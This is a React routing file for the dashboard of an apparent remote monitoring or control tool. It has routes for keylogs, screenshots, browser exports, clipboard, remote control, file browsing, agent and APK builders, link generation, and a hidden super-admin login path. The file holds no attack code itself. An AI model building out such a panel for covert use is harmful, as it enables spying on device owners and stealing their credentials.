import React from 'react';
import { HashRouter, Routes, Route, Navigate } from 'react-router-dom';
import { Toaster } from 'react-hot-toast';
import { useAuth } from './store/auth';
import Login from './pages/Login';
import SuperAdminLogin from './pages/SuperAdminLogin';
import Layout from './components/Layout';
import Dashboard from './pages/Dashboard';
import DeviceDetail from './pages/DeviceDetail';
import Keylogs from './pages/Keylogs';
import Screenshots from './pages/Screenshots';
import Activity from './pages/Activity';
import BrowserExports from './pages/BrowserExports';
import RemoteControl from './pages/RemoteControl';
import Processes from './pages/Processes';
import LiveFeed from './pages/LiveFeed';
import BulkDeploy from './pages/BulkDeploy';
import Clipboard from './pages/Clipboard';
import NetworkScanner from './pages/NetworkScanner';
import PrintJobs from './pages/PrintJobs';
import ScheduledTasks from './pages/ScheduledTasks';
import AccessRequests from './pages/AccessRequests';
import Recordings from './pages/Recordings';
import FileBrowser from './pages/FileBrowser';
import AgentInstaller from './pages/AgentInstaller';
import AgentBAT from './pages/AgentBAT';
import NotificationSettings from './pages/NotificationSettings';
import GenerateLink from './pages/GenerateLink';
import ApkBuilder from './pages/ApkBuilder';

// Secret path for super admin login — set REACT_APP_SA_PATH in dashboard/.env
// Example: REACT_APP_SA_PATH=sa-a7f3d9e2  →  super admin visits /sa-a7f3d9e2
// Never expose or link to this path from anywhere in the UI.
const SA_PATH = process.env.REACT_APP_SA_PATH || 'superadmin';

function Protected({ children }) {
  const { token } = useAuth();
  return token ? children : <Navigate to="/login" replace />;
}

export default function App() {
  const isPopup = new URLSearchParams(window.location.search).get('popup') === '1';

  // Popup mode: render only the requested device page — no sidebar/header
  if (isPopup) {
    return (
      <HashRouter>
        <Toaster position="top-right" toastOptions={{
          style: { background: '#1a1d27', color: '#e2e8f0', border: '1px solid #2a2d3e' }
        }} />
        <Routes>
          <Route path="/login" element={<Login />} />
          <Route path={`/${SA_PATH}`} element={<SuperAdminLogin />} />
          <Route path="device/:deviceId/remote" element={<Protected><RemoteControl /></Protected>} />
          <Route path="*" element={<Navigate to="/login" replace />} />
        </Routes>
      </HashRouter>
    );
  }

  return (
    <HashRouter>
      <Toaster position="top-right" toastOptions={{
        style: { background: '#1a1d27', color: '#e2e8f0', border: '1px solid #2a2d3e' }
      }} />
      <Routes>
        <Route path="/login" element={<Login />} />
        {/* Super admin login — path is secret, configured via REACT_APP_SA_PATH */}
        <Route path={`/${SA_PATH}`} element={<SuperAdminLogin />} />
        <Route path="/" element={<Protected><Layout /></Protected>}>
          <Route index element={<Dashboard />} />
          <Route path="device/:deviceId" element={<DeviceDetail />} />
          <Route path="device/:deviceId/keylogs" element={<Keylogs />} />
          <Route path="device/:deviceId/screenshots" element={<Screenshots />} />
          <Route path="device/:deviceId/activity" element={<Activity />} />
          <Route path="device/:deviceId/browser" element={<BrowserExports />} />
          <Route path="device/:deviceId/remote" element={<RemoteControl />} />
          <Route path="device/:deviceId/processes" element={<Processes />} />
          <Route path="device/:deviceId/network-scanner" element={<NetworkScanner />} />
          <Route path="device/:deviceId/scheduled-tasks" element={<ScheduledTasks />} />
          <Route path="device/:deviceId/recordings" element={<Recordings />} />
          <Route path="device/:deviceId/files" element={<FileBrowser />} />
          <Route path="live" element={<LiveFeed />} />
          <Route path="deploy" element={<BulkDeploy />} />
          <Route path="clipboard" element={<Clipboard />} />
          <Route path="print-jobs" element={<PrintJobs />} />
          <Route path="access-requests" element={<AccessRequests />} />
          <Route path="agent-installer" element={<AgentInstaller />} />
          <Route path="agent-bat" element={<AgentBAT />} />
          <Route path="notifications" element={<NotificationSettings />} />
          <Route path="generate-link" element={<GenerateLink />} />
          <Route path="apk-builder" element={<ApkBuilder />} />
        </Route>
      </Routes>
    </HashRouter>
  );
}
